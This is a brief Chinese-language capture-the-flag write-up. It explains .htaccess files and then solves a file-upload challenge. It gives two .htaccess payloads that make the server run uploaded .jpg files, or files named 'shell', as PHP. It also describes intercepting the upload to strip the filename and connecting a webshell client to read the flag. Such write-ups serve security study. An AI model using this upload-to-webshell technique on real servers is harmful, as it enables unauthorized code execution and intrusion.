.htaccess详解
.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
.htaccess的用途范围主要针对当前目录。
解题思路
简单来说,我们可以先上传一个.htaccess文件,.htaccess将此目录中的jpg文件都解析为php文件
.htaccess文件内容
方法一
#将文件名中只要包含shell的 解析为php文件
<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>方法二
#将jpg文件解析为PHP文件执行
AddType application/x-httpd-php .jpg
在上传.htaccess时有文件名(**.htaccess )
我们可以在上传文件时进行抓包,将文件名去掉 然后放包
此时拿到上传文件相对地址后用蚁剑测试连接
在根目录中拿到flag
